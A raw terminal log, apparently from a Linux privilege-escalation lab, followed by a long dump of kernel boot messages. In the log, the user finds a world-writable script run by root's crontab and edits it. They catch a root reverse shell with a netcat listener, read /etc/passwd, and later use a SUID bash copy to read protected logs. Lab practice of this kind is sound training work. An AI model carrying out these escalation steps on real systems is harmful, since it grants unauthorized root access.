733user@debian:~/tools/mysql-udf$ cat /etc/crontab
734# /etc/crontab: system-wide crontab
735# Unlike any other crontab you don't have to run the `crontab'
736# command to install the new version when you edit this file
737# and files in /etc/cron.d. These files also have username fields,
738# that none of the other crontabs do.
739
740SHELL=/bin/sh
741PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
742
743# m h dom mon dow user command
74417 * * * * root cd / && run-parts --report /etc/cron.hourly
74525 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
74647 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
74752 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
748#
749* * * * * root overwrite.sh
750* * * * * root /usr/local/bin/compress.sh
751
752user@debian:~/tools/mysql-udf$ locate overwrite.sh
753locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
754/usr/local/bin/overwrite.sh
755user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
756-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
757user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
758user@debian:/usr/local/bin$ ls
759compress.sh overwrite.sh suid-env suid-env2 suid-so
760user@debian:/usr/local/bin$ cat overwrite.sh
761#!/bin/bash
762
763echo `date` > /tmp/useless
764user@debian:/usr/local/bin$ nano overwrite.sh
765user@debian:/usr/local/bin$ nc -nvlp 4444
766listening on [any] 4444 ...
767connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
768allexport off
769braceexpand on
770emacs on
771errexit off
772errtrace off
773functrace off
774hashall on
775histexpand on
776history on
777ignoreeof off
778interactive-comments on
779keyword off
780monitor off
781noclobber off
782noexec off
783noglob off
784nolog off
785notify off
786nounset off
787onecmd off
788physical off
789pipefail off
790posix off
791privileged off
792verbose off
793vi off
794xtrace off
795id
796uid=0(root) gid=0(root) groups=0(root)
797ls
798cat /etc/passwd
799root:x:0:0:root:/root:/bin/bash
800daemon:x:1:1:daemon:/usr/sbin:/bin/sh
801bin:x:2:2:bin:/bin:/bin/sh
802sys:x:3:3:sys:/dev:/bin/sh
803sync:x:4:65534:sync:/bin:/bin/sync
804games:x:5:60:games:/usr/games:/bin/sh
805man:x:6:12:man:/var/cache/man:/bin/sh
806lp:x:7:7:lp:/var/spool/lpd:/bin/sh
807mail:x:8:8:mail:/var/mail:/bin/sh
808news:x:9:9:news:/var/spool/news:/bin/sh
809uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
810proxy:x:13:13:proxy:/bin:/bin/sh
811www-data:x:33:33:www-data:/var/www:/bin/sh
812backup:x:34:34:backup:/var/backups:/bin/sh
813list:x:38:38:Mailing List Manager:/var/list:/bin/sh
814irc:x:39:39:ircd:/var/run/ircd:/bin/sh
815gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
816nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
817libuuid:x:100:101::/var/lib/libuuid:/bin/sh
818Debian-exim:x:101:103::/var/spool/exim4:/bin/false
819sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
820user:x:1000:1000:user,,,:/home/user:/bin/bash
821statd:x:103:65534::/var/lib/nfs:/bin/false
822mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
823bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
824user@debian:/usr/local/bin$
825
826login as: user
827user@10.10.170.166's password:
828Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
829
830The programs included with the Debian GNU/Linux system are free software;
831the exact distribution terms for each program are described in the
832individual files in /usr/share/doc/*/copyright.
833
834Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
835permitted by applicable law.
836Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
837user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
838user@debian:~$ cat l33t.txt
839user@debian:~$ ls
840l33t.txt myvpn.ovpn tools
841user@debian:~$ cat l33t.txt
842user@debian:~$ ls
843l33t.txt myvpn.ovpn tools
844user@debian:~$ dmesg | grep /var/log/messages
845user@debian:~$ tail -f /var/log/messages
846tail: cannot open `/var/log/messages' for reading: Permission denied
847user@debian:~$ tail -f /var/log/messages | less
848user@debian:~$ tail -f /var/log/auth.log
849tail: cannot open `/var/log/auth.log' for reading: Permission denied
850user@debian:~$ /tmp/rootbash -p
851rootbash-4.1# tail -f /var/log/messages
852Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
853Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
854Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
855Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
856Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
857Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
858Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
859Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
860Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
861Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
862
863
864
865
866
867ls
868^C
869rootbash-4.1# cat /var/log/messages
870May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
871May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
872May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
873May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
874May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
875May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
876May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
877May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
878May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
879May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
880May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
881May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
882May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
883May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
884May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
885May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
886May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
887May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
888May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
889May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
890May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
891May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
892May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
893May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
894May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
895May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
896May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
897May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
898May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
899May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
900May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
901May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
902May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
903May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
904May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
905May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
906May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
907May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
908May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
909May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
910May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
911May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
912May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
913May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
914May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
915May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
916May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
917May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
918May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
919May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
920May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
921May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
922May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
923May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
924May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
925May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
926May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
927May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
928May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
929May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
930May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
931May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
932May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
933May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
934May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
935May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
936May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
937May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
938May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
939May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
940May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
941May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
942May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
943May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
944May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
945May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
946May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
947May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
948May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
949May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
950May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
951May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
952May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
953May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
954May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
955May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
956May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
957May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
958May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
959May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
960May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
961May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
962May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
963May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
964May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
965May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
966May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
967May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
968May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
969May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
970May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
971May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
972May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
973May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
974May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
975May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
976May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
977May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
978May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
979May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
980May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
981May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
982May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
983May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
984May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
985May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
986May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
987May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
988May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
989May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
990May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
991May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
992May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
993May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
994May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
995May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
996May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
997May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
998May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
999May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1000May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1001May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1002May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1003May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1004May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1005May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1006May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1007May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
1008May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
1009May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
1010May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
1011May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1012May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1013May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
1014May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
1015May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
1016May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1017May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1018May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1019May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1020May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
1021May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1022May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
1023May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
1024May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
1025May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
1026May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1027May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1028May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1029May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1030May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
1031May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1032May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
1033May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
1034May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
1035May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
1036May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1037May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1038May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1039May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1040May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
1041May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1042May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
1043May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
1044May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
1045May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
1046May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
1047May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
1048May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
1049May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
1050May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
1051May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
1052May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
1053May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
1054May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
1055May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
1056May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
1057May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1058May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
1059May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1060May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1061May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1062May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1063May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1064May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1065May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
1066May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
1067May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1068May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1069May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1070May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
1071May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
1072May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
1073May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
1074May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
1075May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1076May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1077May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
1078May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1079May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1080May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1081May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
1082May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
1083May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
1084May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
1085May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
1086May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
1087May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
1088May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1089May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1090May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1091May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
1092May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
1093May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
1094May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
1095May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1096May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
1097May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1098May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
1099May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
1100May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1101May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
1102May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
1103May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
